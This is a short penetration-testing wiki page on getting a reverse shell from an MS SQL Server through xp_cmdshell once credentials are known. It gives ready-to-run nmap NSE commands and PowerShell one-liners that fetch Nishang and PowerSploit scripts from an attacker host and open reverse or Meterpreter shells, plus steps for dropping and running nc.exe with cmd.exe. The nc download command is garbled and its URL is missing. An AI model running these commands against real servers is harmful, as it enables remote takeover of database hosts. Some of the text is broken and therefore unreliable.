🔝 How to get a xp_cmdshell reverse shell

Penetration Testing Wiki

🔝 How to get a xp_cmdshell reverse shell

xp_cmdshell reverse shell

In a pentesting engagement, if you got the credentials of the MS SQL SERVER you can easily execute any command on the database server with nmap NSE script, ms-sql-xp-cmdshell:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP

You have to substitute the following parameters of the above command:

  • mssql.username
  • mssql.password
  • ms-sql-xp-cmdshell.cmd

If you want to execute a reverse shell to connect back to your machine, you can use any of the Windows Powershell post exploitation frameworks.

xp_cmdshell with nishang

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

xp_cmdshell with Powersploit

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"

xp_cmdshell with nc

First we need to download nc to the target machine ( from our machine (

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="powershell.exe wget -OutFile c:\\Users\Public\\nc.exe"

Now we can execute the reverse shell:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="c:\\Users\Public\\nc.exe -e cmd.exe 4444"

More info in the following sections:

SQL Exploitation section
Powershell frameworks for Post-exploitation

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.